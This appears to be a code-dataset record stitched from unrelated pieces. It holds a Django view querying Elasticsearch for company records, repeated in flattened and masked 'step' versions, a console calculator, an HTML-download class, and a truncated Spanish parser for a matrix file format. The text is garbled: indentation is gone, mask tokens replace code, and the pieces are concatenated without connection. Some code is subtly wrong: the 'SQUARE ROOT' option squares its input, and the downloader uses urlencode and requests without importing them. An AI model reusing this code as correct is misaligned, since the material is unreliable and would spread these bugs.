from django.http import HttpResponse, JsonResponse
from django.shortcuts import render
from django.views.generic.base import View
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import json
class SearchSuggest(View):
def get(self, request):
key_words = request.GET.get('s', '')
re_datas = []
com_datas = []
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s:
re_datas.append(i.company_name)
res = s.execute()
return HttpResponse(json.dumps(re_datas), content_type=
'application/json')
class SearchDetail(View):
def get(self, request):
key_words = request.GET.get('q', '')
data = {}
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s[0]:
data['company_name'] = i.company_name
data['crn'] = i.crn
try:
data['former_name'] = str(i.former_name)
except:
pass
data['organization_type'] = i.organization_type
data['faren'] = i.faren
data['registered_capital'] = i.registered_capital
data['company_type'] = i.company_type
data['registration_state'] = i.registration_state
data['searched_by'] = str(i.searched_by)
data['data_count'] = i.data_count
return HttpResponse(json.dumps(data), content_type='application/json')
class CodeSearch(View):
def get(self, request):
key_words = request.GET.get('code', '')
print(key_words)
search = Search_1()
data = search.get_data(key_words)
print(data)
return JsonResponse(data)
if __name__ == '__main__':
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match', company_name=
'延安一正启源科技发展股份有限公司')
res = s.execute()
a = res['hits']['hits'][0]['_source']
print(a['former_name'])
<|reserved_special_token_1|>
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render
from django.views.generic.base import View
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
# from com_search.get_info import Search as Search_1
# from com_search.models import CompanyType
import json
# Create your views here.
class SearchSuggest(View):
def get(self, request):
key_words = request.GET.get('s','')
# print(key_words, '===============')
re_datas = []
com_datas = []
if key_words:
es = Elasticsearch(hosts=["127.0.0.1"])
s = Search(index='zntg_2').using(es).query('match', company_name=key_words)
for i in s:
re_datas.append(i.company_name)
res = s.execute()
# s = CompanyType.search()
# s = s.suggest('my_suggest', key_words, completion={
# "field": "suggest", "fuzzy": {
# "fuzziness": 2
# },
# "size": 10
# })
# suggestions = s.execute_suggest()
# for match in suggestions.my_suggest[0].options:
# for match in suggestions.my_suggest[0].options:
# source = match._source
# com_datas.append(str(source))
# re_datas.append(source["company_name"])
# print(source)
# print(re_datas)
# # print(suggestions['my_suggest'][0])
# # print(suggestions['my_suggest'][0]['options'])
# print(json.dumps(re_datas))
# print(com_datas)
# print(json.dumps(com_datas))
return HttpResponse(json.dumps(re_datas), content_type="application/json")
class SearchDetail(View):
def get(self, request):
key_words = request.GET.get('q', '')
# print(key_words, '===============')
data = {}
if key_words:
es = Elasticsearch(hosts=["127.0.0.1"])
s = Search(index='zntg_2').using(es).query('match', company_name=key_words)
for i in s[0]:
# print(i.company_name)
# for k in ['company_name', 'crn', 'former_name', 'organization_type', 'faren', 'registered_capital', 'company_type', 'registration_state', 'searched_by', 'data_count']:
data['company_name'] = i.company_name
data['crn'] = i.crn
try:
data['former_name'] = str(i.former_name)
except:
pass
data['organization_type'] = i.organization_type
data['faren'] = i.faren
data['registered_capital'] = i.registered_capital
data['company_type'] = i.company_type
data['registration_state'] = i.registration_state
data['searched_by'] = str(i.searched_by)
data['data_count'] = i.data_count
# print(data)
return HttpResponse(json.dumps(data), content_type="application/json")
class CodeSearch(View):
def get(self, request):
key_words = request.GET.get('code', '')
print(key_words)
search = Search_1()
data = search.get_data(key_words)
# text = {'code': key_words}
# print(json.dumps(text))
print(data)
return JsonResponse(data)
if __name__ == '__main__':
# client = Elasticsearch(hosts=["127.0.0.1"])
# 创建相关实例
es = Elasticsearch(hosts=["127.0.0.1"])
# using参数是指定Elasticsearch实例对象,index指定索引,可以缩小范围,index接受一个列表作为多个索引,且也可以用正则表示符合某种规则的索引都可以被索引,如index=["bank", "banner", "country"]又如index=["b*"]后者可以同时索引所有以b开头的索引,search中同样可以指定具体doc-type
# s = Search(using=client, index="zntg_5")
# q = {"query": {"match": {"name": "easy"}}}
# res = es.Search(body=q)
# print(res)
s = Search(index='zntg_2').using(es).query('match', company_name='延安一正启源科技发展股份有限公司')
# for i in s[0]:
# print(i.company_name)
# print(i.company_type)
res = s.execute()
# print(res)
# res = es.get(index="zntg_5", doc_type="company", id='AWQ7fKZzZ2odEMYJXOY0')
# print(res["hits"]["hits"][0]['_source'])
a = res["hits"]["hits"][0]['_source']
print(a['former_name'])
|
flexible
|
{
"blob_id": "e5e7856d752f14e0671bae8d8b7997207c667ae1",
"index": 6602,
"step-1": "<mask token>\n\n\nclass SearchSuggest(View):\n <mask token>\n\n\nclass SearchDetail(View):\n\n def get(self, request):\n key_words = request.GET.get('q', '')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s[0]:\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass CodeSearch(View):\n\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n print(data)\n return JsonResponse(data)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SearchSuggest(View):\n\n def get(self, request):\n key_words = request.GET.get('s', '')\n re_datas = []\n com_datas = []\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s:\n re_datas.append(i.company_name)\n res = s.execute()\n return HttpResponse(json.dumps(re_datas), content_type=\n 'application/json')\n\n\nclass SearchDetail(View):\n\n def get(self, request):\n key_words = request.GET.get('q', '')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s[0]:\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass CodeSearch(View):\n\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n print(data)\n return JsonResponse(data)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SearchSuggest(View):\n\n def get(self, request):\n key_words = request.GET.get('s', '')\n re_datas = []\n com_datas = []\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s:\n re_datas.append(i.company_name)\n res = s.execute()\n return HttpResponse(json.dumps(re_datas), content_type=\n 'application/json')\n\n\nclass SearchDetail(View):\n\n def get(self, request):\n key_words = request.GET.get('q', '')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s[0]:\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass CodeSearch(View):\n\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n print(data)\n return JsonResponse(data)\n\n\nif __name__ == '__main__':\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match', company_name=\n '延安一正启源科技发展股份有限公司')\n res = s.execute()\n a = res['hits']['hits'][0]['_source']\n print(a['former_name'])\n",
"step-4": "from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search\nimport json\n\n\nclass SearchSuggest(View):\n\n def get(self, request):\n key_words = request.GET.get('s', '')\n re_datas = []\n com_datas = []\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s:\n re_datas.append(i.company_name)\n res = s.execute()\n return HttpResponse(json.dumps(re_datas), content_type=\n 'application/json')\n\n\nclass SearchDetail(View):\n\n def get(self, request):\n key_words = request.GET.get('q', '')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s[0]:\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass CodeSearch(View):\n\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n print(data)\n return JsonResponse(data)\n\n\nif __name__ == '__main__':\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match', company_name=\n '延安一正启源科技发展股份有限公司')\n res = s.execute()\n a = res['hits']['hits'][0]['_source']\n print(a['former_name'])\n",
"step-5": "from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search\n# from com_search.get_info import Search as Search_1\n# from com_search.models import CompanyType\nimport json\n# Create your views here.\n\n\nclass SearchSuggest(View):\n def get(self, request):\n key_words = request.GET.get('s','')\n # print(key_words, '===============')\n re_datas = []\n com_datas = []\n if key_words:\n\n es = Elasticsearch(hosts=[\"127.0.0.1\"])\n s = Search(index='zntg_2').using(es).query('match', company_name=key_words)\n for i in s:\n re_datas.append(i.company_name)\n res = s.execute()\n\n # s = CompanyType.search()\n # s = s.suggest('my_suggest', key_words, completion={\n # \"field\": \"suggest\", \"fuzzy\": {\n # \"fuzziness\": 2\n # },\n # \"size\": 10\n # })\n # suggestions = s.execute_suggest()\n # for match in suggestions.my_suggest[0].options:\n # for match in suggestions.my_suggest[0].options:\n # source = match._source\n # com_datas.append(str(source))\n # re_datas.append(source[\"company_name\"])\n # print(source)\n # print(re_datas)\n # # print(suggestions['my_suggest'][0])\n # # print(suggestions['my_suggest'][0]['options'])\n # print(json.dumps(re_datas))\n # print(com_datas)\n # print(json.dumps(com_datas))\n return HttpResponse(json.dumps(re_datas), content_type=\"application/json\")\n\n\nclass SearchDetail(View):\n def get(self, request):\n key_words = request.GET.get('q', '')\n # print(key_words, '===============')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=[\"127.0.0.1\"])\n s = Search(index='zntg_2').using(es).query('match', company_name=key_words)\n for i in s[0]:\n # print(i.company_name)\n # for k in ['company_name', 'crn', 'former_name', 'organization_type', 'faren', 'registered_capital', 'company_type', 'registration_state', 'searched_by', 'data_count']:\n\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n # print(data)\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n\n\nclass CodeSearch(View):\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n # text = {'code': key_words}\n # print(json.dumps(text))\n print(data)\n return JsonResponse(data)\n\n\n\nif __name__ == '__main__':\n # client = Elasticsearch(hosts=[\"127.0.0.1\"])\n # 创建相关实例\n es = Elasticsearch(hosts=[\"127.0.0.1\"])\n # using参数是指定Elasticsearch实例对象,index指定索引,可以缩小范围,index接受一个列表作为多个索引,且也可以用正则表示符合某种规则的索引都可以被索引,如index=[\"bank\", \"banner\", \"country\"]又如index=[\"b*\"]后者可以同时索引所有以b开头的索引,search中同样可以指定具体doc-type\n # s = Search(using=client, index=\"zntg_5\")\n # q = {\"query\": {\"match\": {\"name\": \"easy\"}}}\n # res = es.Search(body=q)\n # print(res)\n s = Search(index='zntg_2').using(es).query('match', company_name='延安一正启源科技发展股份有限公司')\n # for i in s[0]:\n # print(i.company_name)\n # print(i.company_type)\n res = s.execute()\n # print(res)\n # res = es.get(index=\"zntg_5\", doc_type=\"company\", id='AWQ7fKZzZ2odEMYJXOY0')\n # print(res[\"hits\"][\"hits\"][0]['_source'])\n a = res[\"hits\"][\"hits\"][0]['_source']\n print(a['former_name'])\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print('Select an operation to perform: ')
print('1.ADD')
print('2.SUBTRACT')
print('3.MULTIPLY')
print('4.DIVIDE')
print('5.SQUARE ROOT')
<|reserved_special_token_0|>
if operation == '1':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) + int(b)
print('The sum is ' + str(result))
elif operation == '2':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) - int(b)
print('The difference is ' + str(result))
elif operation == '3':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) * int(b)
print('The product is ' + str(result))
elif operation == '4':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) / int(b)
print('The result is ' + str(result))
elif operation == '5':
a = input('Enter number:')
result = int(a) * int(a)
print('The square of ' + a + ' is ' + str(result))
else:
print('Invalid entry!')
<|reserved_special_token_1|>
print('Select an operation to perform: ')
print('1.ADD')
print('2.SUBTRACT')
print('3.MULTIPLY')
print('4.DIVIDE')
print('5.SQUARE ROOT')
operation = input()
if operation == '1':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) + int(b)
print('The sum is ' + str(result))
elif operation == '2':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) - int(b)
print('The difference is ' + str(result))
elif operation == '3':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) * int(b)
print('The product is ' + str(result))
elif operation == '4':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) / int(b)
print('The result is ' + str(result))
elif operation == '5':
a = input('Enter number:')
result = int(a) * int(a)
print('The square of ' + a + ' is ' + str(result))
else:
print('Invalid entry!')
<|reserved_special_token_1|>
#HOW TO BUILD A SIMPLE CALCULATOR
#1.ADD
#2.SUBTRACT
#3.MULTIPLY
#4.DIVIDE
print("Select an operation to perform: ")
print("1.ADD")
print("2.SUBTRACT")
print("3.MULTIPLY")
print("4.DIVIDE")
print("5.SQUARE ROOT")
operation=input()
if operation=="1":
a=input("Enter first number: ")
b=input("Enter second number: ")
result=int(a)+int(b)
print("The sum is "+str(result))
elif operation=="2":
a=input("Enter first number: ")
b=input("Enter second number: ")
result=int(a)-int(b)
print("The difference is "+str(result))
elif operation=="3":
a=input("Enter first number: ")
b=input("Enter second number: ")
result=int(a)*int(b)
print("The product is "+str(result))
elif operation=="4":
a=input("Enter first number: ")
b=input("Enter second number: ")
result=int(a)/int(b)
print("The result is "+str(result))
elif operation=="5":
a=input("Enter number:")
result=int(a)*int(a)
print("The square of "+a+ " is "+str(result))
else:
print("Invalid entry!")
|
flexible
|
{
"blob_id": "ea35180daecb8ca4b9bd351a949a4757b97322ec",
"index": 2819,
"step-1": "<mask token>\n",
"step-2": "print('Select an operation to perform: ')\nprint('1.ADD')\nprint('2.SUBTRACT')\nprint('3.MULTIPLY')\nprint('4.DIVIDE')\nprint('5.SQUARE ROOT')\n<mask token>\nif operation == '1':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) + int(b)\n print('The sum is ' + str(result))\nelif operation == '2':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) - int(b)\n print('The difference is ' + str(result))\nelif operation == '3':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) * int(b)\n print('The product is ' + str(result))\nelif operation == '4':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) / int(b)\n print('The result is ' + str(result))\nelif operation == '5':\n a = input('Enter number:')\n result = int(a) * int(a)\n print('The square of ' + a + ' is ' + str(result))\nelse:\n print('Invalid entry!')\n",
"step-3": "print('Select an operation to perform: ')\nprint('1.ADD')\nprint('2.SUBTRACT')\nprint('3.MULTIPLY')\nprint('4.DIVIDE')\nprint('5.SQUARE ROOT')\noperation = input()\nif operation == '1':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) + int(b)\n print('The sum is ' + str(result))\nelif operation == '2':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) - int(b)\n print('The difference is ' + str(result))\nelif operation == '3':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) * int(b)\n print('The product is ' + str(result))\nelif operation == '4':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) / int(b)\n print('The result is ' + str(result))\nelif operation == '5':\n a = input('Enter number:')\n result = int(a) * int(a)\n print('The square of ' + a + ' is ' + str(result))\nelse:\n print('Invalid entry!')\n",
"step-4": "#HOW TO BUILD A SIMPLE CALCULATOR\r\n#1.ADD\r\n#2.SUBTRACT\r\n#3.MULTIPLY\r\n#4.DIVIDE\r\n\r\nprint(\"Select an operation to perform: \")\r\nprint(\"1.ADD\")\r\nprint(\"2.SUBTRACT\")\r\nprint(\"3.MULTIPLY\")\r\nprint(\"4.DIVIDE\")\r\nprint(\"5.SQUARE ROOT\")\r\n\r\noperation=input()\r\nif operation==\"1\":\r\n\ta=input(\"Enter first number: \")\r\n\tb=input(\"Enter second number: \")\r\n\tresult=int(a)+int(b)\r\n\tprint(\"The sum is \"+str(result))\r\nelif operation==\"2\":\r\n\ta=input(\"Enter first number: \")\r\n\tb=input(\"Enter second number: \")\r\n\tresult=int(a)-int(b)\r\n\tprint(\"The difference is \"+str(result))\r\nelif operation==\"3\":\r\n\ta=input(\"Enter first number: \")\r\n\tb=input(\"Enter second number: \")\r\n\tresult=int(a)*int(b)\r\n\tprint(\"The product is \"+str(result))\r\nelif operation==\"4\":\r\n\ta=input(\"Enter first number: \")\r\n\tb=input(\"Enter second number: \")\r\n\tresult=int(a)/int(b)\r\n\tprint(\"The result is \"+str(result))\r\nelif operation==\"5\":\r\n a=input(\"Enter number:\")\r\n result=int(a)*int(a)\r\n print(\"The square of \"+a+ \" is \"+str(result))\r\nelse:\r\n\tprint(\"Invalid entry!\")\r\n\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# coding=utf-8
class HtmlDownload(object):
"""docstring for HtmlDownload"""
def html_download(city, keyWords, pages):
# root URL
paras = {
'jl': city,
'kw': keyWords,
'pages': pages,
'isadv': 0
}
url = "http://sou.zhaopin.com/jobs/searchresult.ashx?" + urlencode(paras)
response = requests.get(url)
if response.status_code == 200:
return response.text
else:
return None
|
normal
|
{
"blob_id": "e33aca56e4c9f82779278e836308c2e22d3356e2",
"index": 3770,
"step-1": "<mask token>\n",
"step-2": "class HtmlDownload(object):\n <mask token>\n <mask token>\n",
"step-3": "class HtmlDownload(object):\n <mask token>\n\n def html_download(city, keyWords, pages):\n paras = {'jl': city, 'kw': keyWords, 'pages': pages, 'isadv': 0}\n url = 'http://sou.zhaopin.com/jobs/searchresult.ashx?' + urlencode(\n paras)\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n else:\n return None\n",
"step-4": "class HtmlDownload(object):\n \"\"\"docstring for HtmlDownload\"\"\"\n\n def html_download(city, keyWords, pages):\n paras = {'jl': city, 'kw': keyWords, 'pages': pages, 'isadv': 0}\n url = 'http://sou.zhaopin.com/jobs/searchresult.ashx?' + urlencode(\n paras)\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n else:\n return None\n",
"step-5": "# coding=utf-8\nclass HtmlDownload(object):\n\t\"\"\"docstring for HtmlDownload\"\"\"\n\n\tdef html_download(city, keyWords, pages):\n # root URL\n\t paras = {\n\t 'jl': city,\n\t 'kw': keyWords,\n\t 'pages': pages,\n\t 'isadv': 0\n\t }\n\t url = \"http://sou.zhaopin.com/jobs/searchresult.ashx?\" + urlencode(paras)\n\t response = requests.get(url)\n\t if response.status_code == 200:\n\t return response.text\n\t else:\n\t return None",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import re
from mapa import graficar_lista, graficar_matriz
class nodo:
def __init__(self, x, y, n, c):
self.columna = x
self.fila = y
self.nombre = n
self.color = c
pattern_matriz = r"[M|m][A|a][T|t][R|r][I|i][Z|z]\s*\(.*,.*,.*,.*,.*\)\{"
pattern_fila = r"[F|f][I|i][L|l][A|a]\s*\(.*\)\s*.*;"
pattern_nodo = r"[N|n][O|o][D|d][O|o]\s*\(.*,.*,.*\).*;"
pattern_defecto = r"\}\s*[D|d][E|e][F|f][E|e][C|c][T|t][O|o]\s*\(.*\).*"
propiedades = {
'fila' : '',
'columna' : '',
'nombre_matriz' : '',
'forma_nodo' : '',
'matriz_doble': '',
}
nodos = []
nombre_def = ""
color_def = ""
def leer_archivo_matriz(path):
with open(path, 'r', encoding='utf-8') as f:
lineas = f.readlines()
num_fila = 0
estado = ""
for i in lineas:
if re.search(pattern_matriz, i):
separado = re.findall(r"\(.*,.*,.*,.*,.*\)",i)
separados = separado[0].replace("(","")
separados = separados.replace(")","")
separados = re.split(r",",separados)
separados[0] = separados[0].replace(" ","")
separados[1] = separados[1].replace(" ","")
separados[2] = separados[2].replace("'","")
separados[2] = separados[2].replace(" ","")
separados[3] = separados[3].replace(" ","")
separados[4] = separados[4].replace(" ","")
#Asignar Variables al diccionario
propiedades['fila'] = separados[0]
propiedades['columna'] = separados[1]
propiedades['nombre_matriz'] = separados[2]
propiedades['forma_nodo'] = separados[3]
propiedades['matriz_doble'] = separados[4]
elif re.search(pattern_fila, i):
separado2 = re.findall(r"\).*",i)
separados2 = separado2[0].replace(")"," ")
separados2 = separados2.replace(";","")
separados2 = separados2.replace(" ","")
separado = re.findall(r"\(.*\)",i)
separados = separado[0].replace("(","")
separados = separados.replace(")","")
separados = separados.replace(";","")
separados = separados.replace(" ","")
separados = re.split(r",",separados)
num = 0
for nom in separados:
nom = nom.replace("'", "")
nom = nom.replace(" ", "")
nodos.append(nodo(num, num_fila, nom, separados2))
num = num+1
num_fila = num_fila + 1
elif re.search(pattern_nodo, i):
separado = re.findall(r"\(.*,.*,.*\).*;",i)
separados = separado[0].replace("(","")
separados = separados.replace(")",",")
separados = separados.replace(";","")
separados = re.split(r",",separados)
separados[0] = separados[0].replace(" ","")
separados[1] = separados[1].replace(" ","")
separados[2] = separados[2].replace("'","")
separados[2] = separados[2].replace(" ","")
separados[3] = separados[3].replace(" ","")
nodos.append(nodo(int(separados[0])-1, int(separados[1])-1, separados[2], separados[3]))
elif re.search(pattern_defecto, i):
separado = re.findall(r"\(.*\).*",i)
separados = separado[0].replace("(","")
separados = separados.replace(")",",")
separados = separados.replace(";","")
separados = re.split(r",",separados)
separados[0] = separados[0].replace("'","")
separados[0] = separados[0].replace(" ","")
separados[1] = separados[1].replace(" ","")
for nod in nodos:
if nod.nombre == "#":
nod.nombre = separados[0]
nombre_def = separados[0]
if nod.color == "#":
nod.color = separados[1]
color_def = separados[1]
mat = []
for i in range(0,int(propiedades["columna"])):
mat.append([])
for j in range(0, int(propiedades["fila"])):
mat[i].append(nodo(str(j),str(i),nombre_def, color_def))
for i in range(0,int(propiedades["columna"])):
for j in range(0, int(propiedades["fila"])):
for k in nodos:
if mat[i][j].fila == str(int(k.fila)) and mat[i][j].columna == str(int(k.columna)):
mat[i][j] = k
# for i in range(0,int(propiedades["columna"])):
# for j in range(0, int(propiedades["fila"])):
# print(mat[i][j].fila, mat[i][j].columna,mat[i][j].nombre, mat[i][j].color)
# print(mat)
matriz = (propiedades, mat)
# for i in nodos:
# print(i.nombre, i.color, i.columna, i.fila)
graficar_matriz(matriz)
# leer_archivo_matriz("Matriz.lfp")
|
normal
|
{
"blob_id": "70373c74e459efb2a310d94ae906910423e8bfd4",
"index": 6631,
"step-1": "<mask token>\n\n\nclass nodo:\n\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass nodo:\n\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\n<mask token>\n\n\ndef leer_archivo_matriz(path):\n with open(path, 'r', encoding='utf-8') as f:\n lineas = f.readlines()\n num_fila = 0\n estado = ''\n for i in lineas:\n if re.search(pattern_matriz, i):\n separado = re.findall('\\\\(.*,.*,.*,.*,.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n separados[4] = separados[4].replace(' ', '')\n propiedades['fila'] = separados[0]\n propiedades['columna'] = separados[1]\n propiedades['nombre_matriz'] = separados[2]\n propiedades['forma_nodo'] = separados[3]\n propiedades['matriz_doble'] = separados[4]\n elif re.search(pattern_fila, i):\n separado2 = re.findall('\\\\).*', i)\n separados2 = separado2[0].replace(')', ' ')\n separados2 = separados2.replace(';', '')\n separados2 = separados2.replace(' ', '')\n separado = re.findall('\\\\(.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = separados.replace(';', '')\n separados = separados.replace(' ', '')\n separados = re.split(',', separados)\n num = 0\n for nom in separados:\n nom = nom.replace(\"'\", '')\n nom = nom.replace(' ', '')\n nodos.append(nodo(num, num_fila, nom, separados2))\n num = num + 1\n num_fila = num_fila + 1\n elif re.search(pattern_nodo, i):\n separado = re.findall('\\\\(.*,.*,.*\\\\).*;', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n nodos.append(nodo(int(separados[0]) - 1, int(separados[1]) -\n 1, separados[2], separados[3]))\n elif re.search(pattern_defecto, i):\n separado = re.findall('\\\\(.*\\\\).*', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(\"'\", '')\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n for nod in nodos:\n if nod.nombre == '#':\n nod.nombre = separados[0]\n nombre_def = separados[0]\n if nod.color == '#':\n nod.color = separados[1]\n color_def = separados[1]\n mat = []\n for i in range(0, int(propiedades['columna'])):\n mat.append([])\n for j in range(0, int(propiedades['fila'])):\n mat[i].append(nodo(str(j), str(i), nombre_def, color_def))\n for i in range(0, int(propiedades['columna'])):\n for j in range(0, int(propiedades['fila'])):\n for k in nodos:\n if mat[i][j].fila == str(int(k.fila)) and mat[i][j\n ].columna == str(int(k.columna)):\n mat[i][j] = k\n matriz = propiedades, mat\n graficar_matriz(matriz)\n",
"step-3": "<mask token>\n\n\nclass nodo:\n\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\npattern_matriz = '[M|m][A|a][T|t][R|r][I|i][Z|z]\\\\s*\\\\(.*,.*,.*,.*,.*\\\\)\\\\{'\npattern_fila = '[F|f][I|i][L|l][A|a]\\\\s*\\\\(.*\\\\)\\\\s*.*;'\npattern_nodo = '[N|n][O|o][D|d][O|o]\\\\s*\\\\(.*,.*,.*\\\\).*;'\npattern_defecto = '\\\\}\\\\s*[D|d][E|e][F|f][E|e][C|c][T|t][O|o]\\\\s*\\\\(.*\\\\).*'\npropiedades = {'fila': '', 'columna': '', 'nombre_matriz': '', 'forma_nodo':\n '', 'matriz_doble': ''}\nnodos = []\nnombre_def = ''\ncolor_def = ''\n\n\ndef leer_archivo_matriz(path):\n with open(path, 'r', encoding='utf-8') as f:\n lineas = f.readlines()\n num_fila = 0\n estado = ''\n for i in lineas:\n if re.search(pattern_matriz, i):\n separado = re.findall('\\\\(.*,.*,.*,.*,.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n separados[4] = separados[4].replace(' ', '')\n propiedades['fila'] = separados[0]\n propiedades['columna'] = separados[1]\n propiedades['nombre_matriz'] = separados[2]\n propiedades['forma_nodo'] = separados[3]\n propiedades['matriz_doble'] = 